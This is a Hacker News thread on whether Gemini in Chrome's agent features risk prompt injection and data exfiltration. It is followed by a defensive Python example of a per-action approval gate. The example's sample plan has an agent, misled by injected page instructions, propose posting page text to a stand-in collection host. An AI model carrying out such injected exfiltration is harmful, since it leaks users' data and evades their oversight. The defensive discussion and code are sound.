BryantD 2 days ago

I think the "local results" assumption is not completely accurate. This line: "You tell Gemini in Chrome what you want to get done, and it acts on web pages on your behalf, while you focus on other things" implies that the local agent will perform in-browser actions, which in theory enables data exfiltration.

tadfisher 2 days ago | parent [-]

This iteration of Gemini doesn't perform in-browser actions, but they did announce they'll ship an agent later.

BryantD 2 days ago | parent [-]

Yes. I agree that many of the announced and currently shipping features should be just fine from a security perspective with only a local agent.

simonw 2 days ago | parent [-]

Running an LLM locally makes no difference at all to the threat of malicious instructions that make it into the model causing unwanted actions or exfiltrating data.

If anything, a local LLM is more likely to have those problems because it's not as capable at detecting malicious tricks as a larger model.

tadfisher 2 days ago | parent [-]

This is the MCP problem, essentially, and the solution is the same: the user should review and approve specific actions before they are taken.

Of course there will probably be a setting to auto-approve everything...
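The per-action approval gate the thread recommends, as an added example (this is illustration code written for this page, not code from any commenter, from Gemini in Chrome, or from an MCP implementation). It models an agent that proposes a list of tool calls, a gate that lets read-only calls through but asks a human before any side-effecting call, and the "auto-approve everything" setting beside it so the difference is visible in the audit trail. The tool names, the `ApprovalGate` class, the sample plan and the `example.invalid` URLs are all constructed for the example.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ToolCall:
    """One action the agent proposes to take, as tool name plus arguments."""
    tool: str
    args: Dict[str, str]

    def describe(self) -> str:
        rendered = ", ".join(f"{k}={v!r}" for k, v in self.args.items())
        return f"{self.tool}({rendered})"


# Constructed tool inventory: read-only tools can only observe the page;
# side-effecting tools can change state or move data off the page.
READ_ONLY = {"read_page", "find_text"}
SIDE_EFFECTING = {"click", "submit_form", "http_post"}


@dataclass
class ApprovalGate:
    """Decides whether a proposed tool call may execute.

    ask_user is the human-in-the-loop callback; auto_approve is the weak
    setting the thread mentions, which skips that callback entirely.
    """
    ask_user: Callable[[str], bool]
    auto_approve: bool = False
    audit: List[Tuple[str, str]] = field(default_factory=list)

    def allow(self, call: ToolCall) -> bool:
        desc = call.describe()
        if call.tool in READ_ONLY:
            self.audit.append(("allowed:read-only", desc))
            return True
        if call.tool not in SIDE_EFFECTING:
            # Unknown tools are denied outright rather than prompted for.
            self.audit.append(("denied:unknown-tool", desc))
            return False
        if self.auto_approve:
            self.audit.append(("allowed:auto", desc))
            return True
        ok = self.ask_user(desc)
        self.audit.append(("allowed:user" if ok else "denied:user", desc))
        return ok


def run_agent(proposed: List[ToolCall], gate: ApprovalGate) -> List[str]:
    """Run each proposed call the gate permits; here 'run' just records the tool name."""
    executed: List[str] = []
    for call in proposed:
        if gate.allow(call):
            executed.append(call.tool)
    return executed


# Constructed plan: after reading a page whose text carried injected
# instructions, the agent proposes to POST that page text somewhere.
# The read is harmless; the outbound POST is the step a reviewer should stop.
PROPOSED_PLAN = [
    ToolCall("read_page", {"url": "https://example.invalid/inbox"}),
    ToolCall("http_post", {"url": "https://example.invalid/collect", "body": "<page text>"}),
]


def deny_outbound_post(description: str) -> bool:
    """Stand-in for a human reviewer who refuses any outbound POST."""
    return not description.startswith("http_post(")


def demo_auto_approve() -> List[str]:
    gate = ApprovalGate(ask_user=lambda _: True, auto_approve=True)
    return run_agent(PROPOSED_PLAN, gate)


def demo_per_action(decide: Callable[[str], bool]) -> Tuple[List[str], List[Tuple[str, str]]]:
    gate = ApprovalGate(ask_user=decide)
    return run_agent(PROPOSED_PLAN, gate), gate.audit


if __name__ == "__main__":
    print("auto-approve executed:", demo_auto_approve())
    executed, audit = demo_per_action(deny_outbound_post)
    print("per-action executed:", executed)
    for decision, desc in audit:
        print(f"  {decision:20} {desc}")
```

The point the audit trail makes is the one simonw and tadfisher are circling: where the model runs changes nothing about this decision. The gate only sees a proposed action and a human's answer, so the same `http_post` is stopped or waved through depending on the approval setting, not on whether the model behind it was local or remote.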